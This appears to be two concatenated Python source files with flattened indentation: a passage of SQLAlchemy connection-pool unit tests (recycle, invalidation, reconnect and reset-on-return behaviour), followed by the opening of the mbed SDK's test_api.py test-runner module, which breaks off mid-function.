c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0]),
)
def test_recycle(self):
with patch("sqlalchemy.pool.base.time.time") as mock:
mock.return_value = 10000
p = self._queuepool_fixture(
pool_size=1, max_overflow=0, recycle=30
)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
mock.return_value = 10001
c2 = p.connect()
is_(c2.connection, c_ref())
c2.close()
mock.return_value = 10035
c3 = p.connect()
is_not(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
p._invalidate(c2)
assert c2_rec.connection is None
c2.close()
time.sleep(0.5)
c3 = p.connect()
is_not(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_soft_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
c2.invalidate(soft=True)
is_(c2_rec.connection, c2.connection)
c2.close()
c3 = p.connect()
is_not(c3.connection, c_ref())
is_(c3._connection_record, c2_rec)
is_(c2_rec.connection, c3.connection)
def _no_wr_finalize(self):
finalize_fairy = pool._finalize_fairy
def assert_no_wr_callback(
connection, connection_record, pool, ref, echo, fairy=None
):
if fairy is None:
raise AssertionError(
"finalize fairy was called as a weakref callback"
)
return finalize_fairy(
connection, connection_record, pool, ref, echo, fairy
)
return patch.object(pool, "_finalize_fairy", assert_no_wr_callback)
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
with self._no_wr_finalize():
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
assert_raises_context_ok(Exception, p.connect)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = self._with_teardown(p.connect()) # noqa
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = self._with_teardown(p.connect())
c3.close()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2, recycle=1
)
c1 = p.connect()
c1.close()
time.sleep(1.5)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_connect_handler_not_called_for_recycled(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
canary = Mock()
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
event.listen(p, "connect", canary.connect)
event.listen(p, "checkout", canary.checkout)
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
eq_(
canary.mock_calls,
[call.connect(ANY, ANY), call.checkout(ANY, ANY, ANY)],
)
@testing.requires.timing_intensive
def test_connect_checkout_handler_always_gets_info(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
@event.listens_for(p, "connect")
def connect(conn, conn_rec):
conn_rec.info["x"] = True
@event.listens_for(p, "checkout")
def checkout(conn, conn_rec, conn_f):
assert "x" in conn_rec.info
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
def test_error_on_pooled_reconnect_cleanup_wcheckout_event(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.close()
@event.listens_for(p, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if dbapi.is_shutdown:
raise tsa.exc.DisconnectionError()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.predictable_gc
def test_userspace_disconnectionerror_weakref_finalizer(self):
dbapi, pool = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2
)
@event.listens_for(pool, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if getattr(dbapi_con, "boom") == "yes":
raise tsa.exc.DisconnectionError()
conn = pool.connect()
old_dbapi_conn = conn.connection
conn.close()
eq_(old_dbapi_conn.mock_calls, [call.rollback()])
old_dbapi_conn.boom = "yes"
conn = pool.connect()
dbapi_conn = conn.connection
del conn
gc_collect()
# new connection was reset on return appropriately
eq_(dbapi_conn.mock_calls, [call.rollback()])
# old connection was just closed - did not get an
# erroneous reset on return
eq_(old_dbapi_conn.mock_calls, [call.rollback(), call.close()])
@testing.requires.timing_intensive
def test_recycle_pool_no_race(self):
def slow_close():
slow_closing_connection._slow_close()
time.sleep(0.5)
slow_closing_connection = Mock()
slow_closing_connection.connect.return_value.close = slow_close
class Error(Exception):
pass
dialect = Mock()
dialect.is_disconnect = lambda *arg, **kw: True
dialect.dbapi.Error = Error
pools = []
class TrackQueuePool(pool.QueuePool):
def __init__(self, *arg, **kw):
pools.append(self)
super(TrackQueuePool, self).__init__(*arg, **kw)
def creator():
return slow_closing_connection.connect()
p1 = TrackQueuePool(creator=creator, pool_size=20)
from sqlalchemy import create_engine
eng = create_engine(testing.db.url, pool=p1, _initialize=False)
eng.dialect = dialect
# 15 total connections
conns = [eng.connect() for i in range(15)]
# return 8 back to the pool
for conn in conns[3:10]:
conn.close()
def attempt(conn):
time.sleep(random.random())
try:
conn._handle_dbapi_exception(
Error(), "statement", {}, Mock(), Mock()
)
except tsa.exc.DBAPIError:
pass
# run an error + invalidate operation on the remaining 7 open
# connections
threads = []
for conn in conns:
t = threading.Thread(target=attempt, args=(conn,))
t.start()
threads.append(t)
for t in threads:
t.join()
# return all 15 connections to the pool
for conn in conns:
conn.close()
# re-open 15 total connections
conns = [eng.connect() for i in range(15)]
# 15 connections have been fully closed due to invalidate
assert slow_closing_connection._slow_close.call_count == 15
# 15 initial connections + 15 reconnections
assert slow_closing_connection.connect.call_count == 30
assert len(pools) <= 2, len(pools)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(
reset_on_return=None, pool_size=1, max_overflow=0
)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c2 = p.connect() # noqa
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.connection
c1.invalidate()
assert c1.connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.connection is not c1_con
c2_con = c2.connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_no_double_checkin(self):
p = self._queuepool_fixture(pool_size=1)
c1 = p.connect()
rec = c1._connection_record
c1.close()
assert_raises_message(
Warning, "Double checkin attempted on %s" % rec, rec.checkin
)
def test_lifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator, use_lifo=True)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
for i in range(5):
pc1 = p.connect()
is_(pc1.connection, c3)
pc1.close()
pc1 = p.connect()
is_(pc1.connection, c3)
pc2 = p.connect()
is_(pc2.connection, c2)
pc2.close()
pc3 = p.connect()
is_(pc3.connection, c2)
pc2 = p.connect()
is_(pc2.connection, c1)
pc2.close()
pc3.close()
pc1.close()
def test_fifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
pc1 = p.connect()
is_(pc1.connection, c1)
pc1.close()
pc1 = p.connect()
is_(pc1.connection, c2)
pc2 = p.connect()
is_(pc2.connection, c3)
pc2.close()
pc3 = p.connect()
is_(pc3.connection, c1)
pc2 = p.connect()
is_(pc2.connection, c3)
pc2.close()
pc3.close()
pc1.close()
class ResetOnReturnTest(PoolTestBase):
def _fixture(self, **kw):
dbapi = Mock()
return (
dbapi,
pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
)
def test_plain_rollback(self):
dbapi, p = self._fixture(reset_on_return="rollback")
c1 = p.connect()
c1.close()
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_plain_commit(self):
dbapi, p = self._fixture(reset_on_return="commit")
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_plain_none(self):
dbapi, p = self._fixture(reset_on_return=None)
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_agent_rollback(self):
dbapi, p = self._fixture(reset_on_return="rollback")
class Agent(object):
def __init__(self, conn):
self.conn = conn
is_active = True
def rollback(self):
self.conn.special_rollback()
def commit(self):
self.conn.special_commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
assert dbapi.connect().special_rollback.called
assert not dbapi.connect().special_commit.called
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
c1 = p.connect()
c1.close()
eq_(dbapi.connect().special_rollback.call_count, 1)
eq_(dbapi.connect().special_commit.call_count, 0)
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_agent_commit(self):
dbapi, p = self._fixture(reset_on_return="commit")
class Agent(object):
def __init__(self, conn):
self.conn = conn
is_active = True
def rollback(self):
self.conn.special_rollback()
def commit(self):
self.conn.special_commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
assert not dbapi.connect().special_rollback.called
assert dbapi.connect().special_commit.called
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
c1 = p.connect()
c1.close()
eq_(dbapi.connect().special_rollback.call_count, 0)
eq_(dbapi.connect().special_commit.call_count, 1)
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_reset_agent_disconnect(self):
dbapi, p = self._fixture(reset_on_return="rollback")
class Agent(object):
def __init__(self, conn):
self.conn = conn
def rollback(self):
p._invalidate(self.conn)
raise Exception("hi")
def commit(self):
self.conn.commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
# no warning raised. We know it would warn due to
# QueuePoolTest.test_no_double_checkin
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
# TODO: the SingletonThreadPool cleanup method
# has an unfixed race condition within the "cleanup" system that
# leads to this test being off by one connection under load; in any
# case, this connection will be closed once it is garbage collected.
# this pool is not a production-level pool and is only used for the
# SQLite "memory" connection, and is not very useful under actual
# multi-threaded conditions
# @testing.requires.threading_with_mock
# def test_cleanup_no_gc(self):
# self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(0.01)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
lp = len(p._all_conns)
is_true(3 <= lp <= 4)
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
def test_no_rollback_from_nested_connections(self):
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
c1 = p.connect()
mock_conn = c1.connection
c2 = p.connect()
is_(c1, c2)
c2.close()
eq_(mock_conn.mock_calls, [])
c1.close()
eq_(mock_conn.mock_calls, [call.rollback()])
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
c1 = p.connect()
dbapi.connect.assert_has_calls(
[call("foo.db"), call("foo.db")], any_order=True
)
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect("foo.db")
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
class CreatorCompatibilityTest(PoolTestBase):
def test_creator_callable_outside_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator()
finally:
conn.close()
def test_creator_callable_outside_witharg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator(Mock())
finally:
conn.close()
def test_creator_patching_arg_to_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
# the creator is the two-arg form
conn = creator(Mock())
finally:
conn.close()
def mock_create():
return creator()
conn = e.connect()
conn.invalidate()
conn.close()
# test that the 'should_wrap_creator' status
# will dynamically switch if the _creator is monkeypatched.
# patch it with a zero-arg form
with patch.object(e.pool, "_creator", mock_create):
conn = e.connect()
conn.invalidate()
conn.close()
conn = e.connect()
conn.close()
|
test_api.py
|
"""
mbed SDK
Copyright (c) 2011-2014 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author: Przemyslaw Wirkus <Przemyslaw.wirkus@arm.com>
"""
import os
import re
import sys
import json
import uuid
import pprint
import random
import optparse
import datetime
import threading
import ctypes
from types import ListType
from colorama import Fore, Back, Style
from prettytable import PrettyTable
from time import sleep, time
from Queue import Queue, Empty
from os.path import join, exists, basename
from threading import Thread, Lock
from subprocess import Popen, PIPE
# Imports related to mbed build api
from tools.tests import TESTS
from tools.tests import TEST_MAP
from tools.paths import BUILD_DIR
from tools.paths import HOST_TESTS
from tools.utils import ToolException
from tools.utils import NotSupportedException
from tools.utils import construct_enum
from tools.targets import TARGET_MAP
from tools.test_db import BaseDBAccess
from tools.build_api import build_project, build_mbed_libs, build_lib
from tools.build_api import get_target_supported_toolchains
from tools.build_api import write_build_report
from tools.build_api import prep_report
from tools.build_api import prep_properties
from tools.build_api import create_result
from tools.build_api import add_result_to_report
from tools.build_api import scan_for_source_paths
from tools.libraries import LIBRARIES, LIBRARY_MAP
from tools.toolchains import TOOLCHAIN_BIN_PATH
from tools.test_exporters import ReportExporter, ResultExporterType
import tools.host_tests.host_tests_plugins as host_tests_plugins
try:
import mbed_lstools
from tools.compliance.ioper_runner import get_available_oper_test_scopes
except:
pass
class ProcessObserver(Thread):
def __init__(self, proc):
Thread.__init__(self)
self.proc = proc
self.queue = Queue()
self.daemon = True
self.active = True
self.start()
def run(self):
while self.active:
c = self.proc.stdout.read(1)
self.queue.put(c)
def stop(self):
self.active = False
try:
self.proc.terminate()
except Exception, _:
pass
class SingleTestExecutor(threading.Thread):
""" Example: Single test class in separate thread usage
"""
def __init__(self, single_test):
self.single_test = single_test
threading.Thread.__init__(self)
def run(self):
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext = self.single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not self.single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print self.single_test.generate_test_summary(test_summary, shuffle_seed)
if self.single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print self.single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
class SingleTestRunner(object):
""" Object wrapper for single test run which may involve multiple MUTs
"""
RE_DETECT_TESTCASE_RESULT = None
# Return codes for test script
TEST_RESULT_OK = "OK"
TEST_RESULT_FAIL = "FAIL"
TEST_RESULT_ERROR = "ERROR"
TEST_RESULT_UNDEF = "UNDEF"
TEST_RESULT_IOERR_COPY = "IOERR_COPY"
TEST_RESULT_IOERR_DISK = "IOERR_DISK"
TEST_RESULT_IOERR_SERIAL = "IOERR_SERIAL"
TEST_RESULT_TIMEOUT = "TIMEOUT"
TEST_RESULT_NO_IMAGE = "NO_IMAGE"
TEST_RESULT_MBED_ASSERT = "MBED_ASSERT"
TEST_RESULT_BUILD_FAILED = "BUILD_FAILED"
TEST_RESULT_NOT_SUPPORTED = "NOT_SUPPORTED"
GLOBAL_LOOPS_COUNT = 1 # How many times each test should be repeated
TEST_LOOPS_LIST = [] # We redefine no.of loops per test_id
TEST_LOOPS_DICT = {} # TEST_LOOPS_LIST in dict format: { test_id : test_loop_count}
muts = {} # MUTs descriptor (from external file)
test_spec = {} # Test specification (from external file)
# mbed test suite -> SingleTestRunner
TEST_RESULT_MAPPING = {"success" : TEST_RESULT_OK,
"failure" : TEST_RESULT_FAIL,
"error" : TEST_RESULT_ERROR,
"ioerr_copy" : TEST_RESULT_IOERR_COPY,
"ioerr_disk" : TEST_RESULT_IOERR_DISK,
"ioerr_serial" : TEST_RESULT_IOERR_SERIAL,
"timeout" : TEST_RESULT_TIMEOUT,
"no_image" : TEST_RESULT_NO_IMAGE,
"end" : TEST_RESULT_UNDEF,
"mbed_assert" : TEST_RESULT_MBED_ASSERT,
"build_failed" : TEST_RESULT_BUILD_FAILED,
"not_supproted" : TEST_RESULT_NOT_SUPPORTED
}
def __init__(self,
_global_loops_count=1,
_test_loops_list=None,
_muts={},
_clean=False,
_opts_db_url=None,
_opts_log_file_name=None,
_opts_report_html_file_name=None,
_opts_report_junit_file_name=None,
_opts_report_build_file_name=None,
_opts_build_report={},
_opts_build_properties={},
_test_spec={},
_opts_goanna_for_mbed_sdk=None,
_opts_goanna_for_tests=None,
_opts_shuffle_test_order=False,
_opts_shuffle_test_seed=None,
_opts_test_by_names=None,
_opts_peripheral_by_names=None,
_opts_test_only_peripheral=False,
_opts_test_only_common=False,
_opts_verbose_skipped_tests=False,
_opts_verbose_test_result_only=False,
_opts_verbose=False,
_opts_firmware_global_name=None,
_opts_only_build_tests=False,
_opts_parallel_test_exec=False,
_opts_suppress_summary=False,
_opts_test_x_toolchain_summary=False,
_opts_copy_method=None,
_opts_mut_reset_type=None,
_opts_jobs=None,
_opts_waterfall_test=None,
_opts_consolidate_waterfall_test=None,
_opts_extend_test_timeout=None,
_opts_auto_detect=None,
_opts_include_non_automated=False):
""" Let's try hard to init this object
"""
from colorama import init
init()
PATTERN = "\\{(" + "|".join(self.TEST_RESULT_MAPPING.keys()) + ")\\}"
self.RE_DETECT_TESTCASE_RESULT = re.compile(PATTERN)
# Settings related to test loops counters
try:
_global_loops_count = int(_global_loops_count)
except:
_global_loops_count = 1
if _global_loops_count < 1:
_global_loops_count = 1
self.GLOBAL_LOOPS_COUNT = _global_loops_count
self.TEST_LOOPS_LIST = _test_loops_list if _test_loops_list else []
self.TEST_LOOPS_DICT = self.test_loop_list_to_dict(_test_loops_list)
self.shuffle_random_seed = 0.0
self.SHUFFLE_SEED_ROUND = 10
# MUT list and test specification storage
self.muts = _muts
self.test_spec = _test_spec
# Settings passed e.g. from command line
self.opts_db_url = _opts_db_url
self.opts_log_file_name = _opts_log_file_name
self.opts_report_html_file_name = _opts_report_html_file_name
self.opts_report_junit_file_name = _opts_report_junit_file_name
self.opts_report_build_file_name = _opts_report_build_file_name
self.opts_goanna_for_mbed_sdk = _opts_goanna_for_mbed_sdk
self.opts_goanna_for_tests = _opts_goanna_for_tests
self.opts_shuffle_test_order = _opts_shuffle_test_order
self.opts_shuffle_test_seed = _opts_shuffle_test_seed
self.opts_test_by_names = _opts_test_by_names
self.opts_peripheral_by_names = _opts_peripheral_by_names
self.opts_test_only_peripheral = _opts_test_only_peripheral
self.opts_test_only_common = _opts_test_only_common
self.opts_verbose_skipped_tests = _opts_verbose_skipped_tests
self.opts_verbose_test_result_only = _opts_verbose_test_result_only
self.opts_verbose = _opts_verbose
self.opts_firmware_global_name = _opts_firmware_global_name
self.opts_only_build_tests = _opts_only_build_tests
self.opts_parallel_test_exec = _opts_parallel_test_exec
self.opts_suppress_summary = _opts_suppress_summary
self.opts_test_x_toolchain_summary = _opts_test_x_toolchain_summary
self.opts_copy_method = _opts_copy_method
self.opts_mut_reset_type = _opts_mut_reset_type
self.opts_jobs = _opts_jobs if _opts_jobs is not None else 1
self.opts_waterfall_test = _opts_waterfall_test
self.opts_consolidate_waterfall_test = _opts_consolidate_waterfall_test
self.opts_extend_test_timeout = _opts_extend_test_timeout
self.opts_clean = _clean
self.opts_auto_detect = _opts_auto_detect
self.opts_include_non_automated = _opts_include_non_automated
self.build_report = _opts_build_report
self.build_properties = _opts_build_properties
# File / screen logger initialization
self.logger = CLITestLogger(file_name=self.opts_log_file_name) # Default test logger
# Database related initializations
self.db_logger = factory_db_logger(self.opts_db_url)
self.db_logger_build_id = None # Build ID (database index of build_id table)
# Let's connect to database to set up credentials and confirm database is ready
if self.db_logger:
self.db_logger.connect_url(self.opts_db_url) # Save db access info inside db_logger object
if self.db_logger.is_connected():
# Get hostname and uname so we can use it as build description
# when creating new build_id in external database
(_hostname, _uname) = self.db_logger.get_hostname()
_host_location = os.path.dirname(os.path.abspath(__file__))
build_id_type = None if self.opts_only_build_tests is None else self.db_logger.BUILD_ID_TYPE_BUILD_ONLY
self.db_logger_build_id = self.db_logger.get_next_build_id(_hostname, desc=_uname, location=_host_location, type=build_id_type)
self.db_logger.disconnect()
def dump_options(self):
""" Function returns data structure with common settings passed to SingelTestRunner
It can be used for example to fill _extra fields in database storing test suite single run data
Example:
data = self.dump_options()
or
data_str = json.dumps(self.dump_options())
"""
result = {"db_url" : str(self.opts_db_url),
"log_file_name" : str(self.opts_log_file_name),
"shuffle_test_order" : str(self.opts_shuffle_test_order),
"shuffle_test_seed" : str(self.opts_shuffle_test_seed),
"test_by_names" : str(self.opts_test_by_names),
"peripheral_by_names" : str(self.opts_peripheral_by_names),
"test_only_peripheral" : str(self.opts_test_only_peripheral),
"test_only_common" : str(self.opts_test_only_common),
"verbose" : str(self.opts_verbose),
"firmware_global_name" : str(self.opts_firmware_global_name),
"only_build_tests" : str(self.opts_only_build_tests),
"copy_method" : str(self.opts_copy_method),
"mut_reset_type" : str(self.opts_mut_reset_type),
"jobs" : str(self.opts_jobs),
"extend_test_timeout" : str(self.opts_extend_test_timeout),
"_dummy" : ''
}
return result
def shuffle_random_func(self):
return self.shuffle_random_seed
def is_shuffle_seed_float(self):
""" return true if function parameter can be converted to float
"""
result = True
try:
float(self.shuffle_random_seed)
except ValueError:
result = False
return result
# This will store target / toolchain specific properties
test_suite_properties_ext = {} # target : toolchain
# Here we store test results
test_summary = []
# Here we store test results in extended data structure
test_summary_ext = {}
execute_thread_slice_lock = Lock()
def execute_thread_slice(self, q, target, toolchains, clean, test_ids, build_report, build_properties):
for toolchain in toolchains:
tt_id = "%s::%s" % (toolchain, target)
T = TARGET_MAP[target]
# print target, toolchain
# Test suite properties returned to external tools like CI
test_suite_properties = {
'jobs': self.opts_jobs,
'clean': clean,
'target': target,
'vendor': T.extra_labels[0],
'test_ids': ', '.join(test_ids),
'toolchain': toolchain,
'shuffle_random_seed': self.shuffle_random_seed
}
# print '=== %s::%s ===' % (target, toolchain)
# Let's build our test
if target not in TARGET_MAP:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Target platform not found'% (target))
continue
build_mbed_libs_options = ["analyze"] if self.opts_goanna_for_mbed_sdk else None
clean_mbed_libs_options = True if self.opts_goanna_for_mbed_sdk or clean or self.opts_clean else None
try:
build_mbed_libs_result = build_mbed_libs(T,
toolchain,
options=build_mbed_libs_options,
clean=clean_mbed_libs_options,
verbose=self.opts_verbose,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties)
if not build_mbed_libs_result:
print self.logger.log_line(self.logger.LogType.NOTIF, 'Skipped tests for %s target. Toolchain %s is not yet supported for this target'% (T.name, toolchain))
continue
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building MBED libs for %s using %s'% (target, toolchain))
continue
build_dir = join(BUILD_DIR, "test", target, toolchain)
test_suite_properties['build_mbed_libs_result'] = build_mbed_libs_result
test_suite_properties['build_dir'] = build_dir
test_suite_properties['skipped'] = []
# Enumerate through all tests and shuffle test order if requested
test_map_keys = sorted(TEST_MAP.keys())
if self.opts_shuffle_test_order:
random.shuffle(test_map_keys, self.shuffle_random_func)
# Update database with shuffle seed f applicable
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
self.db_logger.update_build_id_info(self.db_logger_build_id, _shuffle_seed=self.shuffle_random_func())
self.db_logger.disconnect();
if self.db_logger:
self.db_logger.reconnect();
if self.db_logger.is_connected():
# Update MUTs and Test Specification in database
self.db_logger.update_build_id_info(self.db_logger_build_id, _muts=self.muts, _test_spec=self.test_spec)
# Update Extra information in database (some options passed to test suite)
self.db_logger.update_build_id_info(self.db_logger_build_id, _extra=json.dumps(self.dump_options()))
self.db_logger.disconnect();
valid_test_map_keys = self.get_valid_tests(test_map_keys, target, toolchain, test_ids, self.opts_include_non_automated)
skipped_test_map_keys = self.get_skipped_tests(test_map_keys, valid_test_map_keys)
for skipped_test_id in skipped_test_map_keys:
test_suite_properties['skipped'].append(skipped_test_id)
# First pass through all tests and determine which libraries need to be built
libraries = []
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
# Detect which lib should be added to test
# Some libs have to compiled like RTOS or ETH
for lib in LIBRARIES:
if lib['build_dir'] in test.dependencies and lib['id'] not in libraries:
libraries.append(lib['id'])
build_project_options = ["analyze"] if self.opts_goanna_for_tests else None
clean_project_options = True if self.opts_goanna_for_tests or clean or self.opts_clean else None
# Build all required libraries
for lib_id in libraries:
try:
build_lib(lib_id,
T,
toolchain,
options=build_project_options,
verbose=self.opts_verbose,
clean=clean_mbed_libs_options,
jobs=self.opts_jobs,
report=build_report,
properties=build_properties)
except ToolException:
print self.logger.log_line(self.logger.LogType.ERROR, 'There were errors while building library %s'% (lib_id))
continue
for test_id in valid_test_map_keys:
test = TEST_MAP[test_id]
test_suite_properties['test.libs.%s.%s.%s'% (target, toolchain, test_id)] = ', '.join(libraries)
# TODO: move this 2 below loops to separate function
INC_DIRS = []
for lib_id in libraries:
if 'inc_dirs_ext' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['inc_dirs_ext']:
INC_DIRS.extend(LIBRARY_MAP[lib_id]['inc_dirs_ext'])
MACROS = []
for lib_id in libraries:
if 'macros' in LIBRARY_MAP[lib_id] and LIBRARY_MAP[lib_id]['macros']:
MACROS.extend(LIBRARY_MAP[lib_id]['macros'])
